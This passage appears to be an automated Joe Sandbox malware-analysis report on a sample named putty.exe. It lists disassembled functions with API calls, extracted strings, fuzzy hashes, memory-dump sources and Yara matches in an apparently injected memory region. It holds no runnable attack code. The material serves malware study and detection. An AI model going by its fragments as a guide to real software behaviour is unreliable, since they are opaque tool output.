Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InformationTimeZone_memset$Exception@8Throw__aulldiv
String ID: *UDF FreeEASpace*UDF DVD CGMS Info$4$8$DVD-Video discs does not allow files larger than 1 GiB.
API String ID: 609399290-1374386333
Opcode ID: d64e74849bf3f2c747974e17131986b9b6048fae946ae7c340c803be7b3ddb9c
Instruction ID: af983e1d6ee9b40dbf32fd893f3e903d09df3973087ccc0bf18a3159252d169c
Opcode Fuzzy Hash: d64e74849bf3f2c747974e17131986b9b6048fae946ae7c340c803be7b3ddb9c
Instruction Fuzzy Hash: 0B223470D042698FDB65CF68C8907DEBBF1AF49304F1481AAD84CAB392E7345A85CF51

Function 00335090 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 003350E7

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

lstrlenW.KERNEL32(Internal error: Unable to locate parent directory in path table.,D747BB9A,00000000,?,00000000), ref: 0033512D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,Internal error: Unable to locate parent directory in path table.,00000001,00000000,00000000,00000000,00000000), ref: 00335146
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,Internal error: Unable to locate parent directory in path table.,00000001,?,?,00000000,00000000,00000000), ref: 003351B2
__CxxThrowException@8.LIBCMT ref: 003351C8

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

Strings

Too many directories in ISO9660 file system. Directory indentifier exceeded 0xffff., xrefs: 003350D1
`N3, xrefs: 00335176
vector<T> too long, xrefs: 00335343, 003353AD
Internal error: Unable to locate parent directory in path table., xrefs: 00335124, 0033513B, 003351A7
`N3, xrefs: 00335491, 00335498

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ByteCharMultiWide$Exception@8Throwlstrlen$ExceptionRaise
String ID: Internal error: Unable to locate parent directory in path table.$Too many directories in ISO9660 file system. Directory indentifier exceeded 0xffff.$`N3$`N3$vector<T> too long
API String ID: 1652506084-1948100293
Opcode ID: d2b3c6051fb70cddb434e1d5cdb860ef1abad1e0011c0990d373ea86e8766abe
Instruction ID: a46476116e5b7d2004f0b850c15c3bdc1aaf90c84659d8d56d85a017af1f58ce
Opcode Fuzzy Hash: d2b3c6051fb70cddb434e1d5cdb860ef1abad1e0011c0990d373ea86e8766abe
Instruction Fuzzy Hash: B8D1F271A046059FCB1ACF29C8C0A6EB7E5FB88324F558A2DF8199B290D770ED04CB91

Function 00344C20 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 340COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00344F02

Strings

Invalid attempt to read row data, xrefs: 00344DD1
Call to NULL read function, xrefs: 00344F78
TADI, xrefs: 00344E36
Extra compressed data, xrefs: 00344FA4, 00344FBB
Not enough image data, xrefs: 00344F6D
sequential row overflow, xrefs: 00344F62
internal sequential row size calculation error, xrefs: 00344FEC
bad adaptive filter value, xrefs: 00344FDC
Decompression error, xrefs: 00344FD0, 00344FD5

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memmove
String ID: Call to NULL read function$Decompression error$Extra compressed data$Invalid attempt to read row data$Not enough image data$TADI$bad adaptive filter value$internal sequential row size calculation error$sequential row overflow
API String ID: 4104443479-2627822520
Opcode ID: 49895d40dbb977d6af4996f6494e58fa5e5e7c5bfda0dbe627da874c60e5f915
Instruction ID: 37b00f6a94ec6d303a0e9da8501614f881399f26b55757bb2e014cebf8e21b41
Opcode Fuzzy Hash: 49895d40dbb977d6af4996f6494e58fa5e5e7c5bfda0dbe627da874c60e5f915
Instruction Fuzzy Hash: BCC1D830604B485BD7239B34A8427FAB7E4AF45304F05497EE9EB8E242DB34BA49CB55

Function 0034B580 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

internal row size calculation error, xrefs: 0034B5EE
invalid user transform pixel depth, xrefs: 0034B7B5
internal row logic error, xrefs: 0034B5BB
internal row width error, xrefs: 0034B5FD

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: internal row logic error$internal row size calculation error$internal row width error$invalid user transform pixel depth
API String ID: 0-64619857
Opcode ID: 9fcd301baedab7e1b4dcf899f6be878c75b6811ed6578df3a5d7e796e07212ff
Instruction ID: 29a48a0a2761729e88c049cacb881965d25500b7cda2f5983230a17aea0468e4
Opcode Fuzzy Hash: 9fcd301baedab7e1b4dcf899f6be878c75b6811ed6578df3a5d7e796e07212ff
Instruction Fuzzy Hash: 6BE13432A0424A8BCB26CE28C4D12FDFBF5EF95310F1A816DC9959B341D735EA46CB90

Function 00328780 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 193timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 003289B5
__CxxThrowException@8.LIBCMT ref: 00328AB3

Strings

;, xrefs: 00328959
0000, xrefs: 00328A17
;, xrefs: 0032899D
wwww, xrefs: 003289C1
ISO9660:1999 supplementary descriptor should not be used on standard ISO9660 file systems., xrefs: 00328A9D

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8InformationThrowTimeZone
String ID: 0000$;$;$ISO9660:1999 supplementary descriptor should not be used on standard ISO9660 file systems.$wwww
API String ID: 3425675350-2091601106
Opcode ID: cf79a3da76adf6ec6f9fe6fa9b5d1a0e584ea7caadefb8677164ed264213a5cb
Instruction ID: c58ad5704af7a6227ef339430335e2bed263d769ea884375197f83a17193328f
Opcode Fuzzy Hash: cf79a3da76adf6ec6f9fe6fa9b5d1a0e584ea7caadefb8677164ed264213a5cb
Instruction Fuzzy Hash: 6291EE61D0D2E98ECB25CA288C547DDBF71EF66200F4881D9D58C67343C6786B89DF62

Function 028A8F65 Relevance: 12.1, Strings: 9, Instructions: 831COMMON

Download Yara Rule

Strings

iefg, xrefs: 028A929E, 028A9200, 028A9761
YJ, xrefs: 028A9007
YJ, xrefs: 028A9851, 028A986D
\', xrefs: 028A900F
#j, xrefs: 028A911A
\', xrefs: 028A9447
iefg, xrefs: 028A8FEF
st, xrefs: 028A924D
YZ[\, xrefs: 028A9833

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: #j$YZ[\$YJ$YJ$\'$\'$iefg$iefg$st
API String ID: 0-1890403295
Opcode ID: fc566ae56acfb9725cc2519a8af6f0d8d1650e552becdd9c1aa39c7ee377fc59
Instruction ID: 72d4ed2504a5af9d45b95c8328d36d8d006ea8d470dcc1f2ece4e4f586c89864
Opcode Fuzzy Hash: fc566ae56acfb9725cc2519a8af6f0d8d1650e552becdd9c1aa39c7ee377fc59
Instruction Fuzzy Hash: 1242007960C3418FE314CF28C89176BBBE1EF85314F188A2DE599DB291DB79D805CB92

Function 0287B6B5 Relevance: 11.7, Strings: 9, Instructions: 423COMMON

Download Yara Rule

Strings

S3o5, xrefs: 0287BA35
9:, xrefs: 0287BB28
*+, xrefs: 0287BA65
P?D!, xrefs: 0287BA4D
Dino, xrefs: 0287B878
|IpE, xrefs: 0287B870
ABV#, xrefs: 0287B91D, 0287B928
LuOv, xrefs: 0287B895
. &., xrefs: 0287B735, 0287B778

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: *+$. &.$9:$ABV#$Dino$LuOv$P?D!$S3o5$|IpE
API String ID: 0-1478922036
Opcode ID: 255c500188c07b11eb94d5cea9ffdb9567896de44df8a2510b29ae21a998d1eb
Instruction ID: 31c0a9670a01f1a985ab2d1f8d222bf3ea913d5715fe7c9b0cd7c70704f8d6ef
Opcode Fuzzy Hash: 255c500188c07b11eb94d5cea9ffdb9567896de44df8a2510b29ae21a998d1eb
Instruction Fuzzy Hash: 95C1057A6483408BD318DF35C89176FBBE2EBC5314F188A2DE5D6CB391DA38C5098B56

Function 0033B580 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 381COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0033B78A
std::_Xinvalid_argument.LIBCPMT ref: 0033B7F1

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

std::_Xinvalid_argument.LIBCPMT ref: 0033B8AD
std::_Xinvalid_argument.LIBCPMT ref: 0033B907

Strings

Error: Unable to find child node "%s" in path "%s"., xrefs: 0033B729
vector<T> too long, xrefs: 0033B785, 0033B7EC, 0033B8A8, 0033B902

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
String ID: Error: Unable to find child node "%s" in path "%s".$vector<T> too long
API String ID: 3336028256-4066457498
Opcode ID: 85c8be1a3d449811f364c43d0b7cd488f5abcbb12b457c5ba98d321ce3871bca
Instruction ID: dddb68559e63ef2bc3b28b2c1c2eed28087d64319fdb587b37c0ad616f5dd5e0
Opcode Fuzzy Hash: 85c8be1a3d449811f364c43d0b7cd488f5abcbb12b457c5ba98d321ce3871bca
Instruction Fuzzy Hash: 20D1A331E002059BCF29DF68C8D19AEF7B6EF84315F25852DEA56AB781DB30E841CB50

Function 00334970 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 307COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00334BBB
std::_Lockit::_Lockit.LIBCPMT ref: 00334CB7
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00334D57

Strings

vector<T> too long, xrefs: 00334963, 00334BB6
/VIDEO_TS, xrefs: 00334B8A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: std::_$Ios_base_dtorLockitLockit::_Xinvalid_argumentstd::ios_base::_
String ID: /VIDEO_TS$vector<T> too long
API String ID: 2180272236-1438924306
Opcode ID: ace996bc8d947d2247e5ebf8d28b159045b0587a86776ab563e1eafc3a894025
Instruction ID: 636ba563094779be269959a4b94a15bb54f28c9ce81eaffa311a556cd15192c4
Opcode Fuzzy Hash: ace996bc8d947d2247e5ebf8d28b159045b0587a86776ab563e1eafc3a894025
Instruction Fuzzy Hash: 58C1D371E00229CBDB26DF64C980BADF7B5BF54304F1586A9D81AA7380E731AD45CF90

Function 0287AFC5 Relevance: 9.0, Strings: 7, Instructions: 260COMMON

Download Yara Rule

Strings

}mko, xrefs: 0287B030
1, xrefs: 0287B0C6
cjzn, xrefs: 0287B07E
P^RS, xrefs: 0287B096
ffh[, xrefs: 0287B08E
e/Wm, xrefs: 0287B086
AGSY, xrefs: 0287B0AE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: 1$AGSY$P^RS$cjzn$e/Wm$ffh[$}mko
API String ID: 0-2140494294
Opcode ID: 6136eac3870bdca1b444ed3f435d4601ff57f6ec20e1981eb9a7568b4fd06344
Instruction ID: 4b6c9202da0fa5ac7a4b85f7b22f8b9b13fb372c6ab23d5036a27337e8db4b29
Opcode Fuzzy Hash: 6136eac3870bdca1b444ed3f435d4601ff57f6ec20e1981eb9a7568b4fd06344
Instruction Fuzzy Hash: 4371013964D3C18EC3158F3984A036BFFE2AF93318F18456DE8D99B242D736C51A9726

Function 0287DEB7 Relevance: 9.0, Strings: 7, Instructions: 238COMMON

Download Yara Rule

Strings

%G.I, xrefs: 0287E043
w%y, xrefs: 0287E063
3[9], xrefs: 0287E015
9W3Y, xrefs: 0287E023
=C;E, xrefs: 0287E03B
5K!M, xrefs: 0287E04B
z{, xrefs: 0287E06B

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: %G.I$3[9]$5K!M$9W3Y$=C;E$z{$w%y
API String ID: 0-930344785
Opcode ID: a7802c479a25c8315e88b3a839f401bcf7e8e634b944f52f7fea769b5c8716dc
Instruction ID: a5de003f3c05a0fa7f4348d84bfb7656c87167f8c54545d42f13702bb8bf6967
Opcode Fuzzy Hash: a7802c479a25c8315e88b3a839f401bcf7e8e634b944f52f7fea769b5c8716dc
Instruction Fuzzy Hash: B261317850C3518BC304CF26D85066BBBF2EFC6315F59CA6CE4CA9B654EB388502CB4A

Function 0288C615 Relevance: 8.8, Strings: 6, Instructions: 1346COMMON

Download Yara Rule

Strings

ez, xrefs: 0288CA59
yxwv, xrefs: 0288D514
ts, xrefs: 0288CA61
I,~M, xrefs: 0288D52A
yxwv, xrefs: 0288CB78
yxwv, xrefs: 0288C678

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: I,~M$ez$ts$yxwv$yxwv$yxwv
API String ID: 0-723935656
Opcode ID: 2fecc13e0da0f34fe5ecb721d344560f5be4694e940b7beaaf20f9c2cf989d10
Instruction ID: bfbb14481ca4598bdf83d7c7964a7c8de4539ee958c7453235bc928bdbf0a7d5
Opcode Fuzzy Hash: 2fecc13e0da0f34fe5ecb721d344560f5be4694e940b7beaaf20f9c2cf989d10
Instruction Fuzzy Hash: B9923A7D6083419FD718EF28CC80B6BB7E2ABC5704F28852DE486CB295DB71D915CB92

Function 003CC960 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,003CCF9D,?,003BCBC3,?,000000BC,?,00000001,00000000,00000000), ref: 003CC99F
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,003CCF9D,?,003BCBC3,?,000000BC,?,00000001,00000000,00000000), ref: 003CC9C8
GetACP.KERNEL32(?,?,003CCF9D,?,003BCBC3,?,000000BC,?,00000001,00000000), ref: 003CC9DC

Strings

ACP, xrefs: 003CC96F
OCP, xrefs: 003CC980

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3c884f4b774dbe7147494b5fbd30a013595f1c1e7788301fcf6ef7df8402806f
Instruction ID: 567265942c885a2e813b82104c7fbb7818214548a856ac65d66cff53634012bf
Opcode Fuzzy Hash: 3c884f4b774dbe7147494b5fbd30a013595f1c1e7788301fcf6ef7df8402806f
Instruction Fuzzy Hash: 0601D43121164ABAEB239B50EC05F9EB7A9AB01359F21151EF50AF10C0DF70CE819755

Function 003B9155 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 003C1137
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003C114C
UnhandledExceptionFilter.KERNEL32(003EA5A8), ref: 003C1157
GetCurrentProcess.KERNEL32(C0000409), ref: 003C1173
TerminateProcess.KERNEL32(00000000), ref: 003C117A

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7282e46cfe252cb04b443ad58596b601b66d8f7f20b8665496d34a61043479dd
Instruction ID: caa229f80f2ca59580ca9bb43ad02f6790365a74bf3d86b88965cf4512c17b42
Opcode Fuzzy Hash: 7282e46cfe252cb04b443ad58596b601b66d8f7f20b8665496d34a61043479dd
Instruction Fuzzy Hash: 7021ABB8912308DFC781DF68FA49A947BA4FB48714F50906AF928D72A1E7F159C08F19

Function 003284B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 003286AC

Strings

;, xrefs: 00328692
0000, xrefs: 00328710
wwww, xrefs: 003286B8

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InformationTimeZone
String ID: 0000$;$wwww
API String ID: 565725191-3903153436
Opcode ID: 9d94b6c1c6694c97609d5ba6e1e3be592c6921de7a9b5efc0fde87b03514c1d4
Instruction ID: c6b623358ca5bab56ede8d6340bf8c6938363b5dc8fbe11b35b722e1019565f1
Opcode Fuzzy Hash: 9d94b6c1c6694c97609d5ba6e1e3be592c6921de7a9b5efc0fde87b03514c1d4
Instruction Fuzzy Hash: 3F81E861709BC6AFC30ECB3C94517E5FFA1BF66200F08469DD4A987343C7246668CBA2

Function 00333440 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,003F2AFC,?), ref: 0033363C

Strings

0000, xrefs: 003336A0
wwww, xrefs: 00333648

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
